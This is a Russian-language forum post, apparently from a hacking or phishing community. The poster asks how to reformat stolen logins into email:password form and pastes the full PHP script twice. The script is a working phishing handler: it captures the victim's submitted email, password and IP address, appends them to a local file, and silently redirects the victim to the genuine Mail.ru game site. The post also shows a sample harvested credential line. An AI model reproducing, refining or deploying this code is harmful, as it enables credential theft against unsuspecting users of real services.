Вот код как сделать что бы из этого: Email: qweqwe@yandex.ru | Pass: 261919qqaa | Ip: 198.50.200.129 | 05:59 | 02.11.2017 | Получилось вот это: qweqwe@yandex.ru:261919qqaa Ip: 198.50.200.129 | 05:59 | 02.11.2017 Вот скрипт: <?PHP $email = $_POST['email']; $password = $_POST['password']; $ip=$_SERVER['REMOTE_ADDR']; $time = date("H:i | d.m.Y"); $ssilka = "./bigdick.php"; If (isset($_POST['email'])){ $fp = fopen($ssilka, "a"); $mytext = "<div>Email: $email | Pass: $password | Ip: <a href = [URL]http://ipgeobase.ru/?address=$ip&search=[/URL] target=_blank style = color:#3AE2CE>$ip </a> | $time |</div>\n"; $test = fwrite($fp, $mytext); fclose($fp); echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=[URL]https://wf.mail.ru/v/[/URL]'></head></html>"; } ?> Код <?PHP $email = $_POST['email']; $password = $_POST['password']; $ip=$_SERVER['REMOTE_ADDR']; $time = date("H:i | d.m.Y"); $ssilka = "./bigdick.php"; If (isset($_POST['email'])){ $fp = fopen($ssilka, "a"); $mytext = "<div>Email: $email | Pass: $password | Ip: <a href = [URL]http://ipgeobase.ru/?address=$ip&search=[/URL] target=_blank style = color:#3AE2CE>$ip </a> | $time |</div>\n"; $test = fwrite($fp, $mytext); fclose($fp); echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=[URL]https://wf.mail.ru/v/[/URL]'></head></html>"; } ?>